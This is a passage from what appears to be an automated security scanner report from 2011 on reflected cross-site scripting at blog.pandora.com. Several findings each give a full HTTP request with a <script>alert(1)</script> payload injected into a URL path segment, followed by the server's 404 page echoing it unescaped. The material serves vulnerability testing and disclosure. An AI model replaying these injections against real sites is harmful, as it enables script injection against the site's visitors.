Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)</script>df1666c9e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)</script>f83864e82ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)</script>191470466ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)</script>09b739b49da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)</script>87512ebd2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>8b77ea0b66d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)</script>14889bb3dee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)</script>1d21570497f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)</script>089a1722201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)</script>b40d4c584c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)</script>c656c2ef387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)</script>e7866274f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)</script>d52c4849003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)</script>3737c338528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)</script>cbc4db6c337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)</script>f60856fbcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 368 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)</script>dbb2a670324 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)</script>950dc27a619 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)</script>af1c2098b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
